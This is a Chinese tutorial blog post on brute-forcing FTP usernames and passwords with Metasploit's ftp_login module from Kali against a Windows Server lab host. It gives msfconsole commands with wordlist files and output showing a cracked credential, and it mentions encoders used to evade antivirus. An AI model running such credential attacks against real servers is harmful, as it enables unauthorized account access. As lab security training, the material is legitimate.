kali下-MSF-ftp_login模块破解FTP账号及密码

2024-01-19 06:36

本文主要是介绍kali下-MSF-ftp_login模块破解FTP账号及密码,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、环境准备

两台设备在同一个网络内

一台kali系统:192.168.10.128

一台winserver2016:192.168.10.132

二、MSF介绍

metasploit 全称是The Metasploit Framework,又称MSF,是Kali 内置的一款渗透测试框架,也是全球最受欢迎的渗透测试工具之一。

MSF允许使用者开发自己的漏洞脚本,从而进行测试,它还可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,提供真正的安全风险情报等。

分为专业版和免费版,下载官网:https://www.metasploit.com/

MSF框架由多个模块组成,各个模块之间的功能如下:

1、auxiliary(辅助模块)该模块不会直接在测试者和目标主机之间建立访问,他们只会负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试

2、Exploit(漏洞利用模块)包括针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码

3、Payload(攻击模块)用于在目标系统上运行任意命令或者执行特定代码,在metasploit中可以自由地选择、传送和植入

4、Post(后期渗透模块)主要用于在取得目标系统远程控制权后,进行一系列地后渗透攻击动作,如获取敏感信息、实施跳板攻击等。

5、Encoders(编码工具模块)负责免杀
渗透攻击步骤:
1、扫描目标系统,寻找可用漏洞
2、选择并配置一个漏洞利用模块3、选择并配置一个攻击载荷模块
4、选择一个编码技术,用来绕过杀软5、攻击渗透

三、使用ftp_login模块破解FTP密码

┌──(root㉿kali)-[~]
└─# msfconsole   进入框架
msf6 > search ftp_login #搜索框架
msf6 > use 0   #使用框架
#设置目标主机
msf6 auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.10.132
#使用密码字典文件
msf6 auxiliary(scanner/ftp/ftp_login) > set pass_file /root/pass.txt
#关闭信任凭据
msf6 auxiliary(scanner/ftp/ftp_login) > set stop_on_success true
#设置登录的用户,可以是文件
msf6 auxiliary(scanner/ftp/ftp_login) > set username zhangsan
msf6 auxiliary(scanner/ftp/ftp_login) > set user_file  /root/user.txt
#攻击
msf6 auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.10.132:21     - 192.168.10.132:21 - Starting FTP login sweep
[+] 192.168.10.132:21     - 192.168.10.132:21 - Login Successful: zhangsan:admin.123
[*] 192.168.10.132:21     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

在这里插入图片描述

这篇关于kali下-MSF-ftp_login模块破解FTP账号及密码的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/621536

相关文章

Oracle登录时忘记用户名或密码该如何解决

《Oracle登录时忘记用户名或密码该如何解决》:本文主要介绍如何在Oracle12c中忘记用户名和密码时找回或重置用户账户信息,文中通过代码介绍的非常详细,对同样遇到这个问题的同学具有一定的参... 目录一、忘记账户:二、忘记密码:三、详细情况情况 1:1.1. 登录到数据库1.2. 查看当前用户信息1.

如何使用Docker部署FTP和Nginx并通过HTTP访问FTP里的文件

《如何使用Docker部署FTP和Nginx并通过HTTP访问FTP里的文件》本文介绍了如何使用Docker部署FTP服务器和Nginx,并通过HTTP访问FTP中的文件,通过将FTP数据目录挂载到N... 目录docker部署FTP和Nginx并通过HTTP访问FTP里的文件1. 部署 FTP 服务器 (

SpringBoot使用Jasypt对YML文件配置内容加密的方法(数据库密码加密)

《SpringBoot使用Jasypt对YML文件配置内容加密的方法(数据库密码加密)》本文介绍了如何在SpringBoot项目中使用Jasypt对application.yml文件中的敏感信息(如数... 目录SpringBoot使用Jasypt对YML文件配置内容进行加密(例:数据库密码加密)前言一、J

Node.js net模块的使用示例

《Node.jsnet模块的使用示例》本文主要介绍了Node.jsnet模块的使用示例,net模块支持TCP通信,处理TCP连接和数据传输,具有一定的参考价值,感兴趣的可以了解一下... 目录简介引入 net 模块核心概念TCP (传输控制协议)Socket服务器TCP 服务器创建基本服务器服务器配置选项服

MySQL9.0默认路径安装下重置root密码

《MySQL9.0默认路径安装下重置root密码》本文主要介绍了MySQL9.0默认路径安装下重置root密码,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们... 目录问题描述环境描述解决方法正常模式下修改密码报错原因问题描述mysqlChina编程采用默认安装路径,

MySQL修改密码的四种实现方式

《MySQL修改密码的四种实现方式》文章主要介绍了如何使用命令行工具修改MySQL密码,包括使用`setpassword`命令和`mysqladmin`命令,此外,还详细描述了忘记密码时的处理方法,包... 目录mysql修改密码四种方式一、set password命令二、使用mysqladmin三、修改u

Python利用自带模块实现屏幕像素高效操作

《Python利用自带模块实现屏幕像素高效操作》这篇文章主要为大家详细介绍了Python如何利用自带模块实现屏幕像素高效操作,文中的示例代码讲解详,感兴趣的小伙伴可以跟随小编一起学习一下... 目录1、获取屏幕放缩比例2、获取屏幕指定坐标处像素颜色3、一个简单的使用案例4、总结1、获取屏幕放缩比例from

nginx-rtmp-module模块实现视频点播的示例代码

《nginx-rtmp-module模块实现视频点播的示例代码》本文主要介绍了nginx-rtmp-module模块实现视频点播,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习... 目录预置条件Nginx点播基本配置点播远程文件指定多个播放位置参考预置条件配置点播服务器 192.

oracle如何连接登陆SYS账号

《oracle如何连接登陆SYS账号》在Navicat12中连接Oracle11g的SYS用户时,如果设置了新密码但连接失败,可能是因为需要以SYSDBA或SYSOPER角色连接,解决方法是确保在连接... 目录oracle连接登陆NmOtMSYS账号工具问题解决SYS用户总结oracle连接登陆SYS账号

电脑密码怎么设置? 一文读懂电脑密码的详细指南

《电脑密码怎么设置?一文读懂电脑密码的详细指南》为了保护个人隐私和数据安全,设置电脑密码显得尤为重要,那么,如何在电脑上设置密码呢?详细请看下文介绍... 设置电脑密码是保护个人隐私、数据安全以及系统安全的重要措施,下面以Windows 11系统为例,跟大家分享一下设置电脑密码的具体办php法。Windo